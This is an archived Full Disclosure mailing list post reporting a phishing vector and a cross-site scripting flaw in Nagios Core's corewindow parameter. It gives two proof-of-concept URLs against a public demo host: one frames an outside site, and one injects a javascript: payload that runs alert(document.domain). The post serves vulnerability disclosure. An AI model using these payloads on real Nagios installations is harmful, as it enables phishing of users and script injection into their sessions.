Full Disclosure mailing list archives

nagios phishing vector & xss

From: randomsec guy <randomsecguy () outlook com>
Date: Thu, 9 Jun 2016 17:34:40 +0000

corewindow can be used to phish users:
http://jdoe:jdoe () nagioscore demos nagios com/nagios/index.php?corewindow=http://wikipedia.com

also to perform xss:
http://jdoe:jdoe () nagioscore demos nagios 
com/nagios/index.php?corewindow=javascript://zz%250a;onload=alert(document.domain)//

_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

Current thread:

nagios phishing vector & xss randomsec guy (Jun 13)